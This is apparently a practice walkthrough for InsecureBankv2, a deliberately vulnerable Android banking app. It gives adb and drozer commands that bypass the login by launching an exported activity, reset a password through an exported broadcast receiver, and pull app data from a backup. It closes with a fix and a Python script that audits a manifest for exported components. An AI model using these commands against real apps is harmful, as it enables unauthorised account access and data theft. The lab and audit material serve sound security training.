First of all, we need to forward the connection, so type this command using the Android Debug Bridge (ADB):
adb forward tcp:31415 tcp:31415
Funny, 31415 is the start of the mathematical constant PI.
Now connect to drozer.
drozer console connect
How to Bypass the Login Screen?
To bypass the login screen we first need to get the activity info.
run app.activity.info -a com.android.insecurebankv2
Now let's bypass!
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
Success! It should now log you in.
How to Reset the Password Through SMS?
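If you want to reset the password through SMS, type in this command, replacing the PHONE_NUMBER and NEW_PASSWORD placeholders with your own values.
adb shell am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber PHONE_NUMBER --es newpass NEW_PASSWORD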
Awesome! It should send you an SMS with the new password.
How to Reveal Sensitive Information From Backup?
First, we need to perform a backup so type in this command here.
adb backup -f backup.ab com.android.insecurebankv2
Now, we need to extract this backup file using the Android Backup Extractor tool.
java -jar abe.jar unpack
When we unzip backup.zip, there should be some juicy information.
Hope you enjoyed this information.
Remember, practice is the key to success.
Let’s first decode the APK and retrieve the Manifest file (APK_FILE below is a placeholder for the path to the app's APK).
apktool decode APK_FILE
Open AndroidManifest.xml in a text editor and you will see that the majority of the Activities and the BroadcastReceiver have “exported” set to true. This is what causes the application to be vulnerable.
Make sure that “exported” is set to false.
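To check the decoded manifest rather than reading it by eye, here is a small audit script, added as an example and not part of the original post or of InsecureBankv2. It goes slightly beyond the text by also flagging components that are exported implicitly through an intent-filter and the allowBackup setting behind the adb backup step; the sample manifest and its com.example.bank names are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest for illustration; not taken from any real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.bank">
  <application android:allowBackup="true">
    <activity android:name=".LoginActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".PostLogin" android:exported="true"/>
    <activity android:name=".Settings" android:exported="false"/>
    <receiver android:name=".ResetReceiver" android:exported="true"
        android:permission="com.example.bank.RESET"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter><action android:name="com.example.bank.SMS"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def audit_manifest(xml_text):
    """Return (finding, component) pairs for a decoded AndroidManifest.xml."""
    app = ET.fromstring(xml_text).find("application")
    findings = []
    # adb backup can read app data unless allowBackup is explicitly "false".
    if app.get(ANDROID + "allowBackup") != "false":
        findings.append(("backup-allowed", "application"))
    for comp in (c for c in app if c.tag in COMPONENTS):
        exported = comp.get(ANDROID + "exported")
        # Before Android 12, an intent-filter with no explicit attribute
        # made activities, services and receivers exported by default.
        implicit = exported is None and comp.find("intent-filter") is not None
        if exported != "true" and not implicit:
            continue
        if comp.get(ANDROID + "permission"):
            kind = "exported-with-permission"  # review the protection level
        else:
            kind = "exported-implicit" if implicit else "exported"
        findings.append((kind, comp.get(ANDROID + "name")))
    return findings


if __name__ == "__main__":
    for kind, name in audit_manifest(SAMPLE_MANIFEST):
        print(f"{kind:26} {name}")
```

An implicitly exported launcher activity is expected; every other finding is a component to set to exported="false" or guard with a permission.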